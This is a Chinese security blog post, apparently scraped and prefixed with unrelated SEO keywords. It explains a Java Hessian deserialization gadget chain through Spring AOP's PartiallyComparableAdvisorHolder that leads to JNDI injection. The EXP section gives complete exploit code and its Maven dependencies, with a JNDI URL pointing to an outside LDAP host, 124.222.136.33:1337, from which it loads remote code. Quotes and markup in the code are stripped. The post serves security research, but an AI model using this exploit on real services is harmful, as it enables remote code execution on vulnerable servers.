建网站那家好,wordpress登陆失败,新桥网站建设,长春网站设计长春网络推广目录
前言
简单分析
EXP 前言
前文#xff1a;【Web】浅聊Java反序列化之Rome——关于其他利用链-CSDN博客
前文里最后给到一条HotSwappableTargetSource利用链#xff0c;就是我们今天PartiallyComparableAdvisorHolder链子的前半段(触发恶意类的toString方法)#xf…目录
前言
简单分析
EXP 前言
前文【Web】浅聊Java反序列化之Rome——关于其他利用链-CSDN博客
前文里最后给到一条HotSwappableTargetSource利用链就是我们今天PartiallyComparableAdvisorHolder链子的前半段(触发恶意类的toString方法)故不再赘述。
多嘴提一句复现的时候记得jdk换成8u100以下的jdk8高版本不能执行远程文件打不了JNDI。 简单分析
简单给出前半部分的调用关系 HashMap#put - HashMap#putVal - HotSwappableTargetSource#equals - XString#equals - AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder#toString - ... 接下来我们来关注省略号的部分发现接着调用了PartiallyComparableAdvisorHolder的advisor属性AspectJPointcutAdvisor的getOrder方法 跟进调用this.advice的getOrder方法这里是AspectJAroundAdvice#getOrder 跟进this.aspectInstanceFactory为BeanFactoryAspectInstanceFactory调用BeanFactoryAspectInstanceFactory#getOrder 跟进this.beanFactory为SimpleJndiBean调用SimpleJndiBean#getType
跟进调用SimpleJndiBean#doGetType
跟进name采用的是单例模式isSingleton为true进入if判断调用doGetSingleton 第一次进入的时候singletonObjects是不会有对应的jndi对象的所以进入else分支触发lookup从而完成JNDI注入 EXP
pom依赖 dependenciesdependencygroupIdorg.springframework/groupIdartifactIdspring-aop/artifactIdversion5.0.0.RELEASE/version/dependencydependencygroupIdorg.springframework/groupIdartifactIdspring-context/artifactIdversion4.1.3.RELEASE/version/dependencydependencygroupIdorg.aspectj/groupIdartifactIdaspectjweaver/artifactIdversion1.6.10/version/dependencydependencygroupIdcom.caucho/groupIdartifactIdhessian/artifactIdversion4.0.66/version/dependency/dependencies
召唤计算器的神奇咒语
package org.Hessian;import com.caucho.hessian.io.HessianInput;
import com.caucho.hessian.io.HessianOutput;
import com.sun.org.apache.xpath.internal.objects.XString;
import org.apache.commons.logging.impl.NoOpLog;
import org.springframework.aop.aspectj.AbstractAspectJAdvice;
import org.springframework.aop.aspectj.AspectInstanceFactory;
import org.springframework.aop.aspectj.AspectJAroundAdvice;
import org.springframework.aop.aspectj.AspectJPointcutAdvisor;
import org.springframework.aop.aspectj.annotation.BeanFactoryAspectInstanceFactory;
import org.springframework.aop.target.HotSwappableTargetSource;
import org.springframework.jndi.support.SimpleJndiBeanFactory;
import sun.reflect.ReflectionFactory;import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;public class EXP {public static void main(String[] args) throws Exception {String jndiUrl ldap://124.222.136.33:1337/#aaa;SimpleJndiBeanFactory bf new SimpleJndiBeanFactory();bf.setShareableResources(jndiUrl);setFieldValue(bf, logger, new NoOpLog());setFieldValue(bf.getJndiTemplate(), logger, new NoOpLog());AspectInstanceFactory aif createWithoutConstructor(BeanFactoryAspectInstanceFactory.class);setFieldValue(aif, beanFactory, bf);setFieldValue(aif, name, jndiUrl);AbstractAspectJAdvice advice createWithoutConstructor(AspectJAroundAdvice.class);setFieldValue(advice, aspectInstanceFactory, aif);AspectJPointcutAdvisor advisor createWithoutConstructor(AspectJPointcutAdvisor.class);setFieldValue(advisor, advice, advice);Class? pcahCl Class.forName(org.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder);Object pcah createWithoutConstructor(pcahCl);setFieldValue(pcah, advisor, advisor);HotSwappableTargetSource v1 new HotSwappableTargetSource(pcah);HotSwappableTargetSource v2 new HotSwappableTargetSource(new XString(xxx));HashMapObject, Object s new HashMap();setFieldValue(s, size, 2);Class? nodeC;try {nodeC Class.forName(java.util.HashMap$Node);}catch ( ClassNotFoundException e ) {nodeC Class.forName(java.util.HashMap$Entry);}Constructor? nodeCons nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);nodeCons.setAccessible(true);Object tbl Array.newInstance(nodeC, 2);Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null));Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null));setFieldValue(s, table, tbl);//序列化ByteArrayOutputStream byteArrayOutputStream new ByteArrayOutputStream();HessianOutput hessianOutput new HessianOutput(byteArrayOutputStream);hessianOutput.getSerializerFactory().setAllowNonSerializable(true);hessianOutput.writeObject(s);hessianOutput.flush();byte[] bytes byteArrayOutputStream.toByteArray();//反序列化ByteArrayInputStream byteArrayInputStream new ByteArrayInputStream(bytes);HessianInput hessianInput new HessianInput(byteArrayInputStream);hessianInput.readObject();}public static void setFieldValue ( final Object obj, final String fieldName, final Object value ) throws Exception {final Field field getField(obj.getClass(), fieldName);field.set(obj, value);}public static Field getField ( final Class? clazz, final String fieldName ) throws Exception {try {Field field clazz.getDeclaredField(fieldName);if ( field ! null )field.setAccessible(true);else if ( clazz.getSuperclass() ! null )field getField(clazz.getSuperclass(), fieldName);return field;}catch ( NoSuchFieldException e ) {if ( !clazz.getSuperclass().equals(Object.class) ) {return getField(clazz.getSuperclass(), fieldName);}throw e;}}public static T T createWithoutConstructor ( ClassT classToInstantiate ) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]);}public static T T createWithConstructor ( ClassT classToInstantiate, Class? super T constructorClass, Class?[] consArgTypes, Object[] consArgs ) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {Constructor? super T objCons constructorClass.getDeclaredConstructor(consArgTypes);objCons.setAccessible(true);Constructor? sc ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons);sc.setAccessible(true);return (T) sc.newInstance(consArgs);}
}
